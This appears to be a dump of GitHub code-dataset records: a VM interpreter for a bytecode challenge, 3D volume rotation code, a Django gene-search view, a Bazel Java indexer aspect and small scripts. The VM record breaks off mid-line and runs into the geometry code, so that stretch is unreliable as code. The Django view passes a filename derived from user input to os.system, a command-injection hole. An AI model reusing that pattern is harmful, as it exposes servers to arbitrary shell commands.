stackoverflow\n \n turtles_run() # recursive function\nturtles_run()\n\n\n\nscreen.exitonclick()","repo_name":"SaintClever/etch_a_sketch_and_turtle_race","sub_path":"turtle_race.py","file_name":"turtle_race.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"14113939763","text":"import json\n\nclass Archivo:\n ruta = 'usuarios.json'\n\n def __init__(self, ruta):\n self.ruta = ruta\n\n def leer(self):\n archivo = open(self.ruta, 'r')\n usuarios = archivo.read()\n usuarios = json.loads(usuarios)\n archivo.close()\n return usuarios\n\n def escribir(self, nuevos_usuarios):\n archivo = open(self.ruta, 'w')\n archivo.write(json.dumps(nuevos_usuarios))\n archivo.close()","repo_name":"EduardoPlata/introduccion_python","sub_path":"archivo.py","file_name":"archivo.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"70955524087","text":"# -*- coding: utf-8 -*-\n\nimport logging\nimport sys\nimport numpy as np\n\nlogging.basicConfig()\nlogger = logging.getLogger('vm')\n# logger.setLevel(logging.DEBUG)\nFILE_PATH = './challenge.bin'\nMAX = 2**15\n\n\nclass Op(object):\n '''\n DESCRIPTION\n -----------\n Interface for operation processing\n '''\n _id = None\n _operands = None\n _vm = None\n\n def __init__(self, vm, next=None):\n self._vm = vm\n self._id = next or self._vm._mem[self._vm._i]\n self._run()\n\n def __shift(self):\n self._vm._i += 1\n\n def __unshift(self):\n self._vm._i -= 1\n\n def __get_next_val(self):\n res = self._vm._mem[self._vm._i]\n return res\n\n def __set_val(self, addr, v):\n if addr >= MAX:\n self._vm._set_reg(addr, v)\n else:\n self._vm._mem[addr] = v\n\n def __get_vals(self, n, raw=False):\n res = []\n for i in xrange(n):\n self.__shift()\n v = self.__get_next_val()\n if not raw and v >= MAX:\n v = self._vm._reg[v % MAX]\n res.append(v)\n if n == 1:\n return res[0]\n return res\n\n def __get_mem(self, addr):\n res = None\n if addr >= MAX:\n res = self._vm._reg[addr % MAX]\n else:\n res = self._vm._mem[addr]\n return res\n\n def __check_reg(self, r):\n if r >= MAX:\n return self._vm._reg[r % MAX]\n return r\n\n def _run(self):\n op = self._get_op()\n if op:\n logger.debug('****pointer={}, inst={} a={} b={} c={}, reg={}, stack={}'.format(\n self._vm._i,\n self._vm._mem[self._vm._i],\n self._vm._mem[self._vm._i + 1],\n self._vm._mem[self._vm._i + 2],\n self._vm._mem[self._vm._i + 3],\n self._vm._reg,\n self._vm._stack,\n ))\n op()\n else:\n logger.warn(\"Unknown operation type {}\".format(self._id))\n self.__shift()\n\n def _get_op(self):\n func_name = '_'.join(('', 'op', str(self._id)))\n if hasattr(self, func_name):\n return getattr(self, func_name)\n\n def _op_0(self):\n '''\n exiting\n '''\n logger.debug('FINISHED')\n exit()\n\n def _op_1(self):\n '''\n set register a to value of b\n '''\n r, v = self.__get_vals(2, raw=True)\n self._vm._set_reg(r, v)\n\n def _op_21(self):\n '''\n no op\n '''\n # logger.debug('NO_OP CODE GOT')\n pass\n\n def _op_19(self):\n '''\n print next char\n '''\n val = self.__get_vals(1)\n sys.stdout.write(unichr(val))\n sys.stdout.flush()\n\n def _op_2(self):\n '''\n push a onto the stack\n '''\n v = self.__get_vals(1)\n self._vm._stack.append(v)\n\n def _op_3(self):\n '''\n remove the top element from the stack and write it into ; empty stack = error\n '''\n self.__shift()\n a = self.__get_next_val()\n v = self._vm._stack.pop()\n self.__set_val(a, v)\n\n def _op_4(self):\n '''\n set to 1 if is equal to ; set it to 0 otherwise\n '''\n a, b, c = self.__get_vals(3, raw=True)\n\n b = self.__check_reg(b)\n c = self.__check_reg(c)\n\n if b == c:\n self.__set_val(a, 1)\n else:\n self.__set_val(a, 0)\n\n def _op_5(self):\n '''\n set to 1 if is greater than ; set it to 0 otherwise\n '''\n a, b, c = self.__get_vals(3, raw=True)\n b = self.__check_reg(b)\n c = self.__check_reg(c)\n if b > c:\n self.__set_val(a, 1)\n else:\n self.__set_val(a, 0)\n\n def _jmp(self, val):\n '''\n jump to \n '''\n self._vm._jmp(val)\n self.__unshift() # for moving back from main cycle\n\n def _op_6(self):\n self._jmp(self.__get_vals(1))\n\n def _op_7(self):\n '''\n jump if a is not zero to b\n '''\n v, addr = self.__get_vals(2)\n if v > 0:\n self._jmp(addr)\n\n def _op_8(self):\n '''\n jump if a is zero to b\n '''\n v, addr = self.__get_vals(2)\n if (v % MAX) == 0:\n self._jmp(addr)\n\n def _op_9(self):\n '''\n assign into the sum of and (modulo 32768)\n '''\n a, b, c = self.__get_vals(3, raw=True)\n self.__set_val(a, (b + c) % MAX)\n\n def _op_10(self):\n '''\n store into the product of and (modulo 32768)\n '''\n a, b, c = self.__get_vals(3, raw=True)\n b = self.__check_reg(b)\n c = self.__check_reg(c)\n self.__set_val(a, (b * c) % MAX)\n\n def _op_11(self):\n '''\n store into the remainder of divided by \n '''\n a, b, c = self.__get_vals(3, raw=True)\n b = self.__check_reg(b)\n c = self.__check_reg(c)\n self.__set_val(a, b % c)\n\n def _op_12(self):\n '''\n stores into the bitwise and of and \n '''\n a, b, c = self.__get_vals(3, raw=True)\n b = self.__check_reg(b)\n c = self.__check_reg(c)\n self.__set_val(a, b & c)\n\n def _op_13(self):\n '''\n stores into the bitwise or of and \n '''\n a, b, c = self.__get_vals(3, raw=True)\n b = self.__check_reg(b)\n c = self.__check_reg(c)\n self.__set_val(a, b | c)\n\n def _op_14(self):\n '''\n stores 15-bit bitwise inverse of in \n '''\n a, b = self.__get_vals(2, raw=True)\n b = self.__check_reg(b)\n v = (2 ** 15) - b - 1\n self.__set_val(a, v)\n\n def _op_15(self):\n '''\n read memory at address and write it to \n '''\n a, b = self.__get_vals(2, raw=True)\n b = self.__check_reg(b)\n self.__set_val(a, self.__get_mem(b))\n\n def _op_16(self):\n '''\n write the value from into memory at address \n '''\n a, b = self.__get_vals(2)\n self.__set_val(a, b)\n\n def _op_17(self):\n '''\n write the address of the next instruction to the stack and jump to \n '''\n self._vm._stack.append(self._vm._i + 2)\n self._jmp(self.__check_reg(self.__get_vals(1, raw=True)))\n\n def _op_18(self):\n '''\n remove the top element from the stack and jump to it; empty stack = halt\n '''\n addr = self._vm._stack.pop()\n if not addr:\n self.op_0()\n self._jmp(addr)\n\n\nclass VM(object):\n _mem = []\n _reg = [0] * 8\n _stack = []\n _i = 0\n\n # for saving state:\n _mems = set()\n _regs = set()\n _stacks = set()\n _is = set()\n\n _last_state = None\n\n def __init__(self, in_file):\n self._read_commands(in_file)\n self._run()\n\n def _save_state(self):\n self._mems.add(frozenset(self._mem))\n self._regs.add(frozenset(self._reg))\n self._stacks.add(frozenset(self._stack))\n self._is.add(self._i)\n\n def _get_state(self):\n return sum((len(i) for i in (self._mems, self._regs, self._stacks, self._is)))\n\n def _jmp(self, val):\n self._i = val\n\n def _set_reg(self, r, v):\n r_index = r % MAX\n self._reg[r_index] = v\n\n def _run(self):\n '''\n DESCRIPTION\n -----------\n Execution of read commands\n '''\n op = Op(self)\n self._save_state()\n repeated = 100\n while op and repeated + 1:\n Op(self)\n self._save_state()\n state = self._get_state()\n if self._last_state == state:\n if repeated > 0:\n repeated -= 1\n else:\n raise ValueError('Endless loop probably, state {}'.format(self._last_state))\n self._last_state = state\n\n def _read_commands(self, in_file):\n '''\n DESCRIPTION\n -----------\n Read commands from in_file and put them into _mem\n in_file: str\n filename of input file with commands\n '''\n self._mem = np.fromfile(in_file, dtype=np.dtype(' x-axis rotation\n # (2,0) -> y-axis rotation\n # (1,0) -> z-axis rotation\n\n # V = rotate(V, alpha, mode='constant', cval=0, order=3, axes=(1, 0), reshape=False)\n # V = rotate(V, beta, mode='constant', cval=0, order=3, axes=(2, 1), reshape=False)\n\n V = rotate(V, alpha, mode='constant', cval=0,\n order=3, axes=(2, 1), reshape=False)\n V = rotate(V, beta, mode='constant', cval=0,\n order=3, axes=(2, 0), reshape=False)\n V = rotate(V, gamma, mode='constant', cval=0,\n order=3, axes=(1, 0), reshape=False)\n return V\n\n\ndef rotate_volume_zxinv(V, alpha, beta, gamma):\n\n alpha = np.rad2deg(alpha)\n beta = np.rad2deg(beta)\n gamma = np.rad2deg(gamma)\n\n # (2,1) -> x-axis rotation\n # (2,0) -> y-axis rotation\n # (1,0) -> z-axis rotation\n\n # V = rotate(V, alpha, mode='constant', cval=0, order=3, axes=(1, 0), reshape=False)\n # V = rotate(V, beta, mode='constant', cval=0, order=3, axes=(2, 1), reshape=False)\n\n V = rotate(V, alpha, mode='constant', cval=0,\n order=3, axes=(1, 0), reshape=False)\n V = rotate(V, beta, mode='constant', cval=0,\n order=3, axes=(2, 1), reshape=False)\n V = rotate(V, gamma, mode='constant', cval=0,\n order=3, axes=(1, 0), reshape=False)\n return V\n\n\ndef create_mask3d(resolution):\n x3, y3, z3 = np.indices((resolution, resolution, resolution))\n x3, y3, z3 = x3-resolution/2, y3-resolution/2, z3-resolution/2\n mask3d = (x3**2+y3**2+z3**2) < (resolution/2)**2\n\n return mask3d\n\n\ndef create_r(resolution):\n x2, y2 = np.indices((resolution, resolution))\n x2, y2 = x2-resolution/2, y2-resolution/2\n r = ((resolution/2)**2-x2**2-y2**2)\n r[r < 1] = 1\n r = np.sqrt(r)\n r = r/r.max()*2\n\n return r\n\n\ndef reconstruction_naive(estimated_images, n, resolution, rotation_list_re):\n mask3d = create_mask3d(resolution)\n r = create_r(resolution)\n voxel_shape = (resolution, resolution, resolution)\n\n V = np.zeros(voxel_shape, dtype=np.float)\n\n for i in tqdm(range(n)):\n estimation = estimated_images[i]\n # V0=np.broadcast_to(image*r,(resolution,resolution,resolution)).transpose((1,2,0))\n V0 = np.broadcast_to(estimation / r, voxel_shape).transpose((1, 2, 0))\n V0 = np.array(V0)\n V0[mask3d == False] = 0\n\n rotations = rotation_list_re[i]\n V = V + rotate_volume(V0, rotations[0], rotations[1], rotations[2])\n\n V = V / n\n\n return V\n","repo_name":"cedricmendelin/master-thesis","sub_path":"src/utils/Geometry.py","file_name":"Geometry.py","file_ext":"py","file_size_in_byte":6563,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"35814137335","text":"from django.shortcuts import render\nfrom search import get_pseudogene_ids, create_fasta\nfrom create_html import create_html\nimport os\nfrom pseudogene.forms import *\nfrom pseudogene.tables import *\n\n\ndef search_form(request):\n error = False\n zero_pseudo = False\n if 'gene' in request.GET:\n gene = request.GET['gene'].upper()\n if not gene:\n error = True\n else:\n # add if gene.html already exists, show straight away\n no_of_pseudogenes, pseudogene_dict, gene_seq = get_pseudogene_ids(gene)\n if no_of_pseudogenes == 0:\n zero_pseudo = True\n else:\n infile = create_fasta(no_of_pseudogenes, pseudogene_dict, gene_seq, gene)\n html_file = create_html(infile, no_of_pseudogenes, gene)\n html_page = '/home/shjn/PycharmProjects/small_apps/pseudogene/templates/pseudogene/%s' % html_file\n os.system(\"mv /home/shjn/PycharmProjects/small_apps/%s \"\n \"/home/shjn/PycharmProjects/small_apps/pseudogene/templates/pseudogene/\" % html_file)\n return render(request, 'pseudogene/results.html', {'html_page': html_page})\n\n return render(request, 'pseudogene/index.html', {'error': error, 'zero': zero_pseudo})\n\n\ndef test_forms(request):\n form = Form1()\n table = AnotherTable.make_table([1, 2, 3])\n\n if request.method == 'POST':\n\n this_form = Form1(request.POST)\n if this_form.is_valid():\n this_obj = this_form.save(commit=False)\n\n return render(request, 'pseudogene/test.html', {'form': form, 'table': table})\n\n","repo_name":"sarahjamieson/small_apps","sub_path":"pseudogene/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"35237958311","text":"load(\"@bazel_tools//tools/cpp:toolchain_utils.bzl\", \"find_cpp_toolchain\")\nload(\n \":artifacts.bzl\",\n \"artifact_location\",\n \"sources_from_target\",\n \"struct_omit_none\",\n)\nload(\":providers.bzl\", \"JarIndexerAspectInfo\")\n\n# TODO(pcj): this file was originally copied from the bazel-intellij project and\n# does way more than we need. Consider rewrite it from scratch and collect java\n# info more simply?\n\n_cpp_header_extensions = [\n \"hh\",\n \"hxx\",\n \"ipp\",\n \"hpp\",\n]\n\n_c_or_cpp_header_extensions = [\"h\"] + _cpp_header_extensions\n\n_cpp_extensions = [\n \"cc\",\n \"cpp\",\n \"cxx\",\n] + _cpp_header_extensions\n\n_java_rules = [\n \"java_library\",\n \"java_binary\",\n \"java_test\",\n \"java_proto_library\",\n \"jvm_import\",\n]\n\n_scala_rules = [\n \"scala_library\",\n \"scala_binary\",\n]\n\n_supported_rules = _java_rules + _scala_rules\n\ndef get_aspect_ids(ctx, target):\n \"\"\"Returns the all aspect ids, filtering out self.\"\"\"\n aspect_ids = None\n if hasattr(ctx, \"aspect_ids\"):\n aspect_ids = ctx.aspect_ids\n elif hasattr(target, \"aspect_ids\"):\n aspect_ids = target.aspect_ids\n else:\n return None\n return [aspect_id for aspect_id in aspect_ids if \"intellij_info_aspect\" not in aspect_id]\n\ndef make_dep(dep, dependency_type):\n \"\"\"Returns a Dependency proto struct.\"\"\"\n return struct(\n dependency_type = dependency_type,\n target = dep.intellij_info.target_key,\n )\n\ndef make_deps(deps, dependency_type):\n \"\"\"Returns a list of Dependency proto structs.\"\"\"\n return [make_dep(dep, dependency_type) for dep in deps]\n\n# Run-time dependency attributes, grouped by type.\nRUNTIME_DEPS = [\n \"runtime_deps\",\n]\n\nPREREQUISITE_DEPS = []\n\n# Dependency type enum\nCOMPILE_TIME = 0\n\nRUNTIME = 1\n\n# Compile-time dependency attributes, grouped by type.\nDEPS = [\n \"_cc_toolchain\", # From cc rules\n \"_stl\", # From cc rules\n \"malloc\", # From cc_binary rules\n \"_java_toolchain\", # From java rules\n \"deps\",\n \"jars\", # from java_import rules\n \"exports\",\n \"java_lib\", # From old proto_library rules\n \"_android_sdk\", # from android rules\n \"aidl_lib\", # from android_sdk\n \"_scala_toolchain\", # From scala rules\n \"test_app\", # android_instrumentation_test\n \"instruments\", # android_instrumentation_test\n \"tests\", # From test_suite\n]\n\n# Defensive list of features that can appear in the C++ toolchain, but which we\n# definitely don't want to enable (when enabled, they'd contribute command line\n# flags that don't make sense in the context of intellij info).\nUNSUPPORTED_FEATURES = [\n \"thin_lto\",\n \"module_maps\",\n \"use_header_modules\",\n \"fdo_instrument\",\n \"fdo_optimize\",\n]\n\ndef make_target_key(label, aspect_ids):\n \"\"\"Returns a TargetKey proto struct from a target.\"\"\"\n return struct_omit_none(\n aspect_ids = tuple(aspect_ids) if aspect_ids else None,\n label = str(label),\n )\n\ndef library_artifact(java_output):\n \"\"\"Creates a LibraryArtifact representing a given java_output.\"\"\"\n if java_output == None or java_output.class_jar == None:\n return None\n src_jars = get_source_jars(java_output)\n return struct_omit_none(\n interface_jar = artifact_location(java_output.ijar),\n jar = artifact_location(java_output.class_jar),\n source_jar = artifact_location(src_jars[0]) if src_jars else None,\n source_jars = [artifact_location(f) for f in src_jars],\n )\n\ndef _is_proto_library_wrapper(target, ctx):\n \"\"\"Returns True if the target is an empty shim around a proto library.\"\"\"\n if not ctx.rule.kind.endswith(\"proto_library\") or ctx.rule.kind == \"proto_library\":\n return False\n\n # treat any *proto_library rule with a single proto_library dep as a shim\n deps = collect_targets_from_attrs(ctx.rule.attr, [\"deps\"])\n return len(deps) == 1 and deps[0].intellij_info and deps[0].intellij_info.kind == \"proto_library\"\n\ndef _get_forwarded_deps(target, ctx):\n \"\"\"Returns the list of deps of this target to forward.\n\n Used to handle wrapper/shim targets which are really just pointers to a\n different target (for example, java_proto_library)\n \"\"\"\n if _is_proto_library_wrapper(target, ctx):\n return collect_targets_from_attrs(ctx.rule.attr, [\"deps\"])\n return []\n\ndef get_source_jars(output):\n \"\"\"Returns a list of source jars from the output.\"\"\"\n if hasattr(output, \"source_jars\"):\n return output.source_jars\n if hasattr(output, \"source_jar\"):\n return [output.source_jar]\n return []\n\ndef jars_from_output(output):\n \"\"\"Collect jars for intellij-resolve-files from Java output.\"\"\"\n if output == None:\n return []\n return [\n jar\n for jar in ([output.class_jar, output.ijar] + get_source_jars(output))\n if jar != None and not jar.is_source\n ]\n\ndef _collect_generated_files(java):\n \"\"\"Collects generated files from a Java target\"\"\"\n if hasattr(java, \"java_outputs\"):\n return [\n (outputs.generated_class_jar, outputs.generated_source_jar)\n for outputs in java.java_outputs\n if outputs.generated_class_jar != None\n ]\n\n # Handles Bazel versions before 5.0.0.\n if (hasattr(java, \"annotation_processing\") and java.annotation_processing and java.annotation_processing.enabled):\n return [(java.annotation_processing.class_jar, java.annotation_processing.source_jar)]\n return []\n\ndef annotation_processing_jars(generated_class_jar, generated_source_jar):\n fail(\"not used\")\n \"\"\"Creates a LibraryArtifact representing Java annotation processing jars.\"\"\"\n src_jar = generated_source_jar\n return struct_omit_none(\n jar = artifact_location(generated_class_jar),\n source_jar = artifact_location(src_jar),\n source_jars = [artifact_location(src_jar)] if src_jar else None,\n )\n\ndef get_java_provider(target):\n \"\"\"Find a provider exposing java compilation/outputs data.\"\"\"\n\n # Check for scala and kt providers before JavaInfo. e.g. scala targets have\n # JavaInfo, but their data lives in the \"scala\" provider and not JavaInfo.\n # See https://github.com/bazelbuild/intellij/pull/1202\n if hasattr(target, \"scala\"):\n return target.scala\n if hasattr(target, \"kt\") and hasattr(target.kt, \"outputs\"):\n return target.kt\n if JavaInfo in target:\n return target[JavaInfo]\n if hasattr(java_common, \"JavaPluginInfo\") and java_common.JavaPluginInfo in target:\n return target[java_common.JavaPluginInfo]\n return None\n\ndef update_set_in_dict(input_dict, key, other_set):\n fail(\"not used\")\n \"\"\"Updates depset in dict, merging it with another depset.\"\"\"\n input_dict[key] = depset(transitive = [input_dict.get(key, depset()), other_set])\n\ndef divide_java_sources(ctx):\n \"\"\"Divide sources into plain java, generated java, and srcjars.\"\"\"\n\n java_sources = []\n gen_java_sources = []\n srcjars = []\n if hasattr(ctx.rule.attr, \"srcs\"):\n srcs = ctx.rule.attr.srcs\n for src in srcs:\n for f in src.files.to_list():\n if f.basename.endswith(\".java\"):\n if f.is_source:\n java_sources.append(f)\n else:\n gen_java_sources.append(f)\n elif f.basename.endswith(\".srcjar\"):\n srcjars.append(f)\n\n return java_sources, gen_java_sources, srcjars\n\ndef _is_cpp_target(srcs):\n fail(\"not used\")\n if all([src.extension in _c_or_cpp_header_extensions for src in srcs]):\n return True # assume header-only lib is c++\n return any([src.extension in _cpp_extensions for src in srcs])\n\ndef _is_objcpp_target(srcs):\n fail(\"not used\")\n return any([src.extension == \"mm\" for src in srcs])\n\ndef _sources(ctx, target):\n fail(\"not used\")\n srcs = []\n if hasattr(ctx.rule.attr, \"srcs\"):\n srcs += [f for src in ctx.rule.attr.srcs for f in src.files.to_list()]\n if hasattr(ctx.rule.attr, \"hdrs\"):\n srcs += [f for src in ctx.rule.attr.hdrs for f in src.files.to_list()]\n\n return srcs\n\ndef is_valid_aspect_target(target):\n \"\"\"Returns whether the target has had the aspect run on it.\"\"\"\n return hasattr(target, \"intellij_info\")\n\ndef _collect_target_from_attr(rule_attrs, attr_name, result):\n \"\"\"Collects the targets from the given attr into the result.\"\"\"\n if not hasattr(rule_attrs, attr_name):\n return\n attr_value = getattr(rule_attrs, attr_name)\n type_name = type(attr_value)\n if type_name == \"Target\":\n result.append(attr_value)\n elif type_name == \"list\":\n result.extend(attr_value)\n\ndef collect_targets_from_attrs(rule_attrs, attrs):\n \"\"\"Returns a list of targets from the given attributes.\"\"\"\n result = []\n for attr_name in attrs:\n _collect_target_from_attr(rule_attrs, attr_name, result)\n return [target for target in result if is_valid_aspect_target(target)]\n\ndef _jarindex_basename(ctx, label):\n return \"-\".join([\n # # ctx.label.workspace_name if ctx.label.workspace_name else \"ctx\",\n # ctx.label.package if ctx.label.package else \"_\",\n ctx.label.name,\n label.workspace_name if label.workspace_name else \"default\",\n label.package if label.package else \"_\",\n label.name,\n ])\n\ndef jarindexer_action(ctx, label, kind, executable, jar):\n output_file = ctx.actions.declare_file(_jarindex_basename(ctx, label) + \".javaindex.pb\")\n ctx.actions.run(\n mnemonic = \"JarIndexer\",\n progress_message = \"Indexing \" + jar.basename,\n executable = executable,\n arguments = [\n \"--label\",\n str(label),\n \"--kind\",\n kind,\n \"--output_file\",\n output_file.path,\n jar.path,\n ],\n inputs = [jar],\n outputs = [output_file],\n )\n return output_file\n\ndef collect_java_toolchain_info(target, ide_info, ide_info_file):\n \"\"\"Updates java_toolchain-relevant output groups, returns false if not a java_toolchain target.\"\"\"\n if hasattr(target, \"java_toolchain\"):\n toolchain = target.java_toolchain\n elif java_common.JavaToolchainInfo != platform_common.ToolchainInfo and \\\n java_common.JavaToolchainInfo in target:\n toolchain = target[java_common.JavaToolchainInfo]\n else:\n return False\n\n javac_jars = []\n if hasattr(toolchain, \"tools\"):\n javac_jars = [\n artifact_location(f)\n for f in toolchain.tools.to_list()\n if f.basename.endswith(\".jar\")\n ]\n ide_info[\"java_toolchain_ide_info\"] = struct_omit_none(\n javac_jars = javac_jars,\n source_version = toolchain.source_version,\n target_version = toolchain.target_version,\n )\n\n return True\n\ndef collect_java_info(ctx, target, feature_configuration, cc_toolchain, ide_info, jar_index_files):\n java = get_java_provider(target)\n if not java:\n return False\n if hasattr(java, \"java_outputs\") and java.java_outputs:\n java_outputs = java.java_outputs\n elif hasattr(java, \"outputs\") and java.outputs:\n java_outputs = java.outputs.jars\n else:\n return False\n\n java_semantics = None\n\n # java_semantics = semantics.java if hasattr(semantics, \"java\") else None\n if java_semantics and java_semantics.skip_target(target, ctx):\n return False\n\n sources = sources_from_target(ctx)\n jars = [library_artifact(output) for output in java_outputs]\n class_jars = [output.class_jar for output in java_outputs if output and output.class_jar]\n output_jars = [jar for output in java_outputs for jar in jars_from_output(output)]\n resolve_files = output_jars\n compile_files = class_jars\n\n gen_jars = []\n for generated_class_jar, generated_source_jar in _collect_generated_files(java):\n gen_jars.append(annotation_processing_jars(generated_class_jar, generated_source_jar))\n resolve_files += [\n jar\n for jar in [\n generated_class_jar,\n generated_source_jar,\n ]\n if jar != None and not jar.is_source\n ]\n compile_files += [\n jar\n for jar in [generated_class_jar]\n if jar != None and not jar.is_source\n ]\n\n jdeps = None\n jdeps_file = None\n if java_semantics and hasattr(java_semantics, \"get_filtered_jdeps\"):\n jdeps_file = java_semantics.get_filtered_jdeps(target)\n if jdeps_file == None and hasattr(java, \"outputs\") and hasattr(java.outputs, \"jdeps\") and java.outputs.jdeps:\n jdeps_file = java.outputs.jdeps\n if jdeps_file:\n jdeps = artifact_location(jdeps_file)\n resolve_files.append(jdeps_file)\n\n java_sources, gen_java_sources, srcjars = divide_java_sources(ctx)\n\n if java_semantics:\n srcjars = java_semantics.filter_source_jars(target, ctx, srcjars)\n\n # Custom lint checks are incorporated as java plugins. We collect them here and register them with the IDE so that the IDE can also run the same checks.\n plugin_processor_jars = []\n if hasattr(java, \"annotation_processing\") and java.annotation_processing:\n plugin_processor_jar_files = java.annotation_processing.processor_classpath.to_list()\n resolve_files += plugin_processor_jar_files\n plugin_processor_jars = [annotation_processing_jars(jar, None) for jar in plugin_processor_jar_files]\n\n if java_outputs:\n class_jars = [info.class_jar for info in java_outputs]\n for jar in class_jars:\n if not jar.basename.endswith(\"_java.jar\"):\n jar_index_file = jarindexer_action(ctx, target.label, ctx.rule.kind, ctx.executable._jarindexer, jar)\n jar_index_files.append(jar_index_file)\n\n java_info = struct_omit_none(\n generated_jars = gen_jars,\n jars = jars,\n jdeps = jdeps,\n main_class = getattr(ctx.rule.attr, \"main_class\", None),\n sources = sources,\n test_class = getattr(ctx.rule.attr, \"test_class\", None),\n )\n\n ide_info[\"java_ide_info\"] = java_info\n\n return True\n\ndef _java_indexer_aspect_impl(target, ctx):\n deps = []\n if hasattr(ctx.rule.attr, \"deps\"):\n deps.extend(ctx.rule.attr.deps)\n if hasattr(ctx.rule.attr, \"runtime_deps\"):\n deps.extend(ctx.rule.attr.runtime_deps)\n\n transitive_info_file = []\n transitive_jar_index_files = []\n java_info_files = []\n for dep in deps:\n if JarIndexerAspectInfo not in dep:\n continue\n transitive_info_file.append(dep[JarIndexerAspectInfo].info_file)\n transitive_jar_index_files.append(dep[JarIndexerAspectInfo].jar_index_files)\n java_info_files.append(dep[OutputGroupInfo].java_info_files)\n\n # We support only these rule kinds.\n if ctx.rule.kind not in _supported_rules:\n return [\n JarIndexerAspectInfo(\n info_file = depset(transitive = transitive_info_file),\n jar_index_files = depset(transitive = transitive_jar_index_files),\n ),\n OutputGroupInfo(\n java_info_files = depset(transitive = java_info_files),\n ),\n ]\n\n cc_toolchain = find_cpp_toolchain(ctx)\n feature_configuration = cc_common.configure_features(\n ctx = ctx,\n cc_toolchain = cc_toolchain,\n requested_features = ctx.features,\n unsupported_features = ctx.disabled_features + UNSUPPORTED_FEATURES,\n )\n\n rule_attrs = ctx.rule.attr\n\n # Collect direct dependencies\n direct_dep_targets = collect_targets_from_attrs(\n rule_attrs,\n DEPS,\n )\n direct_deps = make_deps(direct_dep_targets, COMPILE_TIME)\n\n # Add exports from direct dependencies\n exported_deps_from_deps = []\n for dep in direct_dep_targets:\n exported_deps_from_deps = exported_deps_from_deps + dep.intellij_info.export_deps\n\n # Combine into all compile time deps\n compiletime_deps = direct_deps + exported_deps_from_deps\n\n # Propagate my own exports\n export_deps = []\n direct_exports = []\n if JavaInfo in target:\n direct_exports = collect_targets_from_attrs(rule_attrs, [\"exports\"])\n export_deps.extend(make_deps(direct_exports, COMPILE_TIME))\n\n # Collect transitive exports\n for export in direct_exports:\n export_deps.extend(export.intellij_info.export_deps)\n\n if ctx.rule.kind == \"android_library\":\n # Empty android libraries export all their dependencies.\n if not hasattr(rule_attrs, \"srcs\") or not ctx.rule.attr.srcs:\n export_deps.extend(compiletime_deps)\n\n # Deduplicate the entries\n export_deps = depset(export_deps).to_list()\n\n # runtime_deps\n runtime_dep_targets = collect_targets_from_attrs(\n rule_attrs,\n RUNTIME_DEPS,\n )\n runtime_deps = make_deps(runtime_dep_targets, RUNTIME)\n all_deps = depset(compiletime_deps + runtime_deps).to_list()\n\n # extra prerequisites\n extra_prerequisite_targets = collect_targets_from_attrs(\n rule_attrs,\n PREREQUISITE_DEPS,\n )\n\n forwarded_deps = _get_forwarded_deps(target, ctx) + direct_exports\n\n # Roll up output files from my prerequisites\n prerequisites = direct_dep_targets + runtime_dep_targets + extra_prerequisite_targets + direct_exports\n output_groups = dict()\n for dep in prerequisites:\n for k, v in dep.intellij_info.output_groups.items():\n if dep in forwarded_deps:\n # unconditionally roll up deps for these targets\n output_groups[k] = output_groups[k] + [v] if k in output_groups else [v]\n continue\n\n # roll up outputs of direct deps into '-direct-deps' output group\n if k.endswith(\"-direct-deps\"):\n continue\n if k.endswith(\"-outputs\"):\n directs = k[:-len(\"outputs\")] + \"direct-deps\"\n output_groups[directs] = output_groups[directs] + [v] if directs in output_groups else [v]\n continue\n\n # everything else gets rolled up transitively\n output_groups[k] = output_groups[k] + [v] if k in output_groups else [v]\n\n # Convert output_groups from lists to depsets after the lists are finalized. This avoids\n # creating and growing depsets gradually, as that results in depsets many levels deep:\n # a construct which would give the build system some trouble.\n for k, v in output_groups.items():\n output_groups[k] = depset(transitive = output_groups[k])\n\n # Initialize the ide info dict, and corresponding output file\n # This will be passed to each language-specific handler to fill in as required\n file_name = target.label.name\n\n # bazel allows target names differing only by case, so append a hash to support\n # case-insensitive file systems\n file_name = file_name + \"-\" + str(hash(file_name))\n aspect_ids = get_aspect_ids(ctx, target)\n if aspect_ids:\n aspect_hash = hash(\".\".join(aspect_ids))\n file_name = file_name + \"-\" + str(aspect_hash)\n file_name = file_name + \".java_info.json\"\n ide_info_file = ctx.actions.declare_file(file_name)\n\n output_groups = dict()\n target_key = make_target_key(target.label, aspect_ids)\n ide_info = dict(\n # build_file_artifact_location = build_file_artifact_location(ctx),\n features = ctx.features,\n key = target_key,\n kind_string = ctx.rule.kind,\n tags = ctx.rule.attr.tags,\n deps = list(all_deps),\n )\n\n jar_index_files = []\n if ctx.rule.kind in _supported_rules:\n handled = False\n handled = collect_java_info(ctx, target, feature_configuration, cc_toolchain, ide_info, jar_index_files)\n handled = collect_java_toolchain_info(target, ide_info, ide_info_file) or handled\n else:\n fail(\"unsupported java_index rule: \\\"%s\\\" (must be one of %s)\" % (ctx.rule.kind, _java_rules))\n\n # Write the commands for this target.\n info = struct_omit_none(**ide_info)\n ctx.actions.write(\n content = json.encode(info),\n output = ide_info_file,\n )\n ctx.actions.write(ide_info_file, info.to_json())\n\n info_file = depset([ide_info_file], transitive = transitive_info_file)\n\n return [\n JarIndexerAspectInfo(\n info_file = info_file,\n jar_index_files = depset(direct = jar_index_files, transitive = transitive_jar_index_files),\n ),\n OutputGroupInfo(\n java_info_files = depset([ide_info_file], transitive = java_info_files),\n jar_index_files = depset(jar_index_files, transitive = transitive_jar_index_files),\n ),\n ]\n\njava_indexer_aspect = aspect(\n attr_aspects = [\"deps\", \"runtime_deps\"],\n attrs = {\n \"_cc_toolchain\": attr.label(\n default = Label(\"@bazel_tools//tools/cpp:current_cc_toolchain\"),\n ),\n \"_jarindexer\": attr.label(\n default = Label(\"@build_stack_scala_gazelle//cmd/jarindexer:jarindexer_bin\"),\n cfg = \"exec\",\n executable = True,\n ),\n },\n fragments = [\"cpp\", \"java\"],\n provides = [JarIndexerAspectInfo],\n toolchains = [\"@bazel_tools//tools/cpp:toolchain_type\"],\n implementation = _java_indexer_aspect_impl,\n apply_to_generating_rules = 